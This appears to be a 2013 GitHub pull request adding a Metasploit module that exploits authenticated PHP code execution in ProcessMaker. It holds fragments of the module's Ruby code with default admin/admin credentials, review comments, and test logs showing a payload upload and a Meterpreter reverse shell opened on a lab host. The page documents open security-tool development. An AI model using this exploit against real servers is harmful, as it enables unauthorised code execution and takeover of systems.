Add ProcessMaker Open Source Authenticated PHP Code Execution #2591

Merged: 1 commit, Oct 29, 2013


@bcoles
Contributor
bcoles commented Oct 29, 2013

Add ProcessMaker Open Source Authenticated PHP Code Execution exploit module.

Description:
ProcessMaker is an open-source workflow management software suite, which
includes tools to automate your workflow, design forms, create documents, assign
roles and users, create routing rules, and map an individual process quickly and
easily. It's relatively lightweight and doesn't require any kind of installation
on the client computer.

ProcessMaker Open Source Authenticated PHP Code Execution


@jvazquez-r7 jvazquez-r7 commented on the diff Oct 29, 2013
modules/exploits/multi/http/processmaker_exec.rb
+ ],
+ 'Privileged' => false, # Privileged on Windows but not on *nix targets
+ 'DisclosureDate' => 'Oct 24 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'The username for ProcessMaker', 'admin']),
+ OptString.new('PASSWORD', [true, 'The password for ProcessMaker', 'admin'])
+ ], self.class)
+ end
+
+ #
+ # Clean up on new session
+ #
+ def on_new_session(client)
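Review bot: the hand-written `on_new_session` cleanup handler duplicates what the FileDropper mixin already provides; including Msf::Exploit::FileDropper and calling register_files_for_cleanup with the uploaded file name lets the framework delete it when the session opens, which is also what the review comment below is asking about. Separately, `'Privileged' => false, # Privileged on Windows but not on *nix targets` records a target-dependent privilege level only in a code comment; state it in the module description or per-target notes so the module metadata and the operator's expectations agree.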
@jvazquez-r7
jvazquez-r7 Oct 29, 2013 Contributor

Isn't FileDropper able to do its work?

@jvazquez-r7 jvazquez-r7 commented on the diff Oct 29, 2013
modules/exploits/multi/http/processmaker_exec.rb
+ # send login request
+ print_status("#{peer} - Authenticating as user '#{user}'")
+ begin
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, "/sysworkflow/en/neoclassic/login/authentication.php"),
+ 'cookie' => @cookie,
+ 'vars_post' => vars_post
+ })
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+ print_error("#{peer} - Connection failed")
+ end
+ if res and res.code == 200 and res.body =~ /Loading styles and images/
+ print_good("#{peer} - Authenticated as user '#{user}'")
+ else
+ fail_with(Failure::NoAccess, "#{peer} - Authenticating as user '#{user}' failed")
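Review bot: the rescue branch at `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ...` only prints an error and falls through, so a connection failure reaches `if res and res.code == 200 and res.body =~ /Loading styles and images/` with `res` nil and is then reported as an authentication failure; return nil (or re-raise) from the rescue so the two cases stay distinguishable. The `fail_with(Failure::NoAccess, ...)` in the else branch also aborts `check` instead of letting it return Exploit::CheckCode::Unknown; have the login helper return true/false and let `exploit` call fail_with when it gets false. The success test on the UI string "Loading styles and images" is also brittle across versions and translations; prefer a marker less likely to change, such as the response status or redirect issued on a successful login.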
@jvazquez-r7
jvazquez-r7 Oct 29, 2013 Contributor

Don't use fail_with on methods called from check

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Oct 29, 2013
jvazquez-r7 Land #2591, @bcoles's exploit for ProcessMaker 1b75aef
@jvazquez-r7 jvazquez-r7 merged commit 3eed800 into rapid7:master Oct 29, 2013

1 check passed: the Travis CI build passed.
@jvazquez-r7
Contributor

Hi @bcoles, cleanup for the comments can be found here: c4c171d

It has been landed because these are minor things, easy to fix, and the module is working ok :)

  • test check
msf exploit(processmaker_exec) > check

[*] 192.168.172.135:80 - Authenticating as user 'admin'
[-] 192.168.172.135:80 - Authenticating as user 'admin' failed
[*] Cannot reliably check exploitability.
msf exploit(processmaker_exec) > set password admin
password => admin
msf exploit(processmaker_exec) > check

[*] 192.168.172.135:80 - Authenticating as user 'admin'
[+] 192.168.172.135:80 - Authenticated as user 'admin'
[*] 192.168.172.135:80 - Sending check
[+] The target is vulnerable.
  • test exploit
msf exploit(processmaker_exec) > set password fail
password => fail
msf exploit(processmaker_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.135:80 - Authenticating as user 'admin'
[-] 192.168.172.135:80 - Authenticating as user 'admin' failed
[-] Exploit failed [no-access]: 192.168.172.135:80 - Authentication failed
[*] Exploit completed, but no session was created.
msf exploit(processmaker_exec) > set password admin
password => admin
msf exploit(processmaker_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.135:80 - Authenticating as user 'admin'
[+] 192.168.172.135:80 - Authenticated as user 'admin'
[*] 192.168.172.135:80 - Sending payload 'V7hd5EevO9Ho.php' (1795 bytes)
[+] 192.168.172.135:80 - Payload sent successfully
[*] 192.168.172.135:80 - Retrieving file 'V7hd5EevO9Ho.php'
[*] Sending stage (39195 bytes) to 192.168.172.135
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.135:32789) at 2013-10-29 09:53:08 -0500
[+] Deleted V7hd5EevO9Ho.php

^C[-] Exploit failed: Interrupt

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : processmaker
OS          : Linux processmaker 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64
Meterpreter : php/php
meterpreter > exit

Thanks!

@bcoles
Contributor
bcoles commented Oct 29, 2013

Thanks. Tested changes and confirmed working. 🔨🐢

@bcoles bcoles deleted the bcoles:processmaker_exec branch Nov 23, 2013